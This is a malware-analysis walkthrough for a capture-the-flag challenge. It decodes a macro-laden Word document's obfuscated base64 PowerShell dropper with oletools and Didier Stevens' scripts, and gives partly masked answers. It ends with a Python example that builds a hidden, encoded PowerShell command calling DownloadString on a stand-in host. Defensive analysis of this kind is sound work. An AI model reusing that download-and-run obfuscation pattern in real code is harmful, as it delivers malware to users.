MalDoc 101 Malware Analysis Walkthrough

BlackMamba
Published in InfoSec Write-ups, Aug 29, 2021 (5 min read)

WEBSITE : cyberdefenders.org/

CHALLENGE : MalDoc 101

CATEGORY : MALWARE ANALYSIS, VBA MACRO

TOOLS : oletools, oledump.py, olevba, strings, deobfuscate-repetitions.py, base64dump.py, tr, grep, re-search.py

#1) Multiple streams contain macros in this document. Provide the number of highest one.

First we need to list the streams that contain macros. Run oledump.py against the sample: in its stream overview, streams holding VBA code are flagged with an "M" (and streams holding only macro attribute lines with a lowercase "m").

Among the flagged streams, note the highest stream number.

ANS : 1..

#2 What event is used to begin the execution of the macros?

Here we need the olevba tool.

What is olevba?

olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing, and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel 4 Macros are also supported in Excel and SLK files.

$ olevba <sample file name>

Look at the summary table olevba prints after the macro source. Entries of type AutoExec identify the auto-executable macro, i.e. the document event that starts the code; the Suspicious and IOC rows list the malicious functions and activities found.

ANS : Doc …..

#3 What malware family was this maldoc attempting to drop?

This one is simple. Go to virustotal.com and look up the file (search by its hash, or upload it if the hash is unknown). The detection names and the community/sandbox tags show which malware family the document drops.

ANS : emo……..

#4 What stream is responsible for the storage of the base64-encoded string?

$ olevba <sample file name>

Scroll down through the extracted macro source until you reach the large base64-encoded string, and note the name of the stream (shown in the header above each macro) that contains it.

The next step is to map that name to a stream number: run $ oledump.py <sample file name> and look up the number of the stream with that name.

ANS : 3…..

#5 This document contains a user-form. Provide the name?

For this question I used LibreOffice Draw. Do this in an isolated VM with macro execution disabled in LibreOffice's security settings. Open the document in Draw and go to Tools -> Macros -> Organize Macros -> Basic -> sample.bin -> project -> forms -> [ USER FORM NAME ].

ANS : roubh….

#6 This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?

The real analysis starts here, because this question needs more work than the previous ones. It was also the most interesting part. Here we use some basic Linux commands and a couple of Python tools that were new to me.

Step 1: First run the strings command to pull all printable strings out of the document.
$ strings -a sample.bin
That produces a very large number of strings, most of which we do not need. The base64 blob we are after is long, so restrict the output to strings of at least 1500 characters:

$ strings -n 1500 -a sample.bin

Yes, we get a huge base64-encoded string. In this form it is not usable, but it can be converted into a usable one.

STEP 2: deobfuscate-repetitions.py (from Didier Stevens' tool suite) searches an obfuscated string for substrings that are repeated throughout it. Pipe the strings output into it: the repeated fragment it reports is the value used to pad the base64 string, and the tool also prints the string with the repeats removed.

ANS : 2342772g3&*g…………………………

#7 What is the program executed by the base64 encoded string?

Look at the decoded strings in the output of deobfuscate-repetitions.py.

ANS : pow…..

#8 What WMI class is used to create the process to launch the trojan?

The de-padded string is still not readable, so our next job is to decode it completely. First select the PowerShell string from the previous stage: the -f flag of deobfuscate-repetitions.py filters its output to the deobfuscated strings that contain the given text.

$strings -n 1500 -a /home/changalamaadan4n6/Downloads/MalDoc101/sample.bin | ./deobfuscate-repetitions.py -f powersheLL

Yes, we have it, but we are not done yet. The next step is to decode the base64 string with the help of base64dump.py:

$strings -n 1500 -a /home/changalamaadan4n6/Downloads/MalDoc101/sample.bin | ./deobfuscate-repetitions.py -f powersheLL | ./base64dump.py

base64dump.py lists the base64 strings it finds in its input. Now it is time to decode the one we want: -s 1 selects the first string and -t utf16 decodes it as UTF-16, which is the encoding PowerShell's -EncodedCommand expects.

$strings -n 1500 -a /home/changalamaadan4n6/Downloads/MalDoc101/sample.bin | ./deobfuscate-repetitions.py -f powersheLL | ./base64dump.py -s 1 -t utf16

The decoded script is written in the usual concatenation style, so we strip the unwanted +, ', ( and ) characters with the tr command (tr -d with those four characters) to make it readable.

Now let's dig into the cleaned string for the answer.

ANS : win32………
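The following is an added example, not part of this writeup or of the tools it uses: it reproduces the three steps of questions 6 to 8 (find the repeated pad, strip it, base64-decode as UTF-16 and remove the +'() noise) in plain Python so the logic can be followed without the sample. The PowerShell script, the pad value "a!bc@de#f" and the "powersheLL -w hidden -e" prefix are constructed for the example and are not the challenge's values. The pad search keeps the substring with the highest repeat count and, among those, the longest, which is why the full pad wins over its own fragments and over the pad plus a neighbouring character.

```python
import base64
import re
from collections import Counter

# --- Constructed sample (not the challenge's strings) ----------------------
# A PowerShell one-liner in the ('a'+'b') concatenation style; this is where
# the "+", "'", "(" and ")" noise removed with tr comes from.
SCRIPT = ("$c = &('Ne'+'w-Ob'+'ject') ('Net'+'.Web'+'Client'); "
          "$c.DownloadString('http://example.invalid/payload')")
# Hypothetical pad value. Every 4-character window of it contains a character
# outside the base64 alphabet, so its fragments cannot occur inside the blob.
PAD = "a!bc@de#f"

# A base64 blob as base64dump.py would pick it out of the command line.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def build_obfuscated(script, pad, chunk=8):
    """Emulate how the maldoc stores the command: the PowerShell script is
    UTF-16LE base64 encoded (what -e/-EncodedCommand takes), the whole command
    is cut into chunks and the pad is inserted between every two chunks."""
    b64 = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    command = "powersheLL -w hidden -e " + b64
    chunks = [command[i:i + chunk] for i in range(0, len(command), chunk)]
    return pad.join(chunks)


def find_repeated_pad(text, min_len=4, max_len=32):
    """What deobfuscate-repetitions.py surfaces: the substring repeated most
    often; on equal counts the longest one, so the full pad beats its pieces."""
    best = (0, 0, None)  # (count, length, substring)
    for length in range(min_len, max_len + 1):
        counts = Counter(text[i:i + length]
                         for i in range(len(text) - length + 1))
        for sub, count in counts.items():
            if (count, length) > best[:2]:
                best = (count, length, sub)
    return best[2]


def analyze(obfuscated):
    """The walkthrough's pipeline on one string:
    deobfuscate-repetitions.py -> base64dump.py -t utf16 -> tr -d \"+'()\"."""
    pad = find_repeated_pad(obfuscated)
    command = obfuscated.replace(pad, "")            # the de-padded command line
    program = command.split()[0].lower()             # Q7: the program launched
    encoded = BASE64_RE.search(command).group(0)     # the -EncodedCommand blob
    script = base64.b64decode(encoded).decode("utf-16le")  # base64dump -t utf16
    cleaned = script.translate({ord(c): None for c in "+'()"})  # tr -d "+'()"
    return {"pad": pad, "program": program, "script": script, "cleaned": cleaned}


if __name__ == "__main__":
    sample = build_obfuscated(SCRIPT, PAD)
    result = analyze(sample)
    for key in ("pad", "program", "cleaned"):
        print(f"{key}: {result[key]}")
```

On a real sample the pad is not guaranteed to be the single best-scoring candidate, which is why deobfuscate-repetitions.py prints a ranked list of repeats rather than one answer; check the candidates against the macro source, where the pad is usually visible as the argument of a Replace call. Note also that tr -d removes the quotes from every string in the script, URLs included, so read IOCs from the decoded script rather than from the cleaned one.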
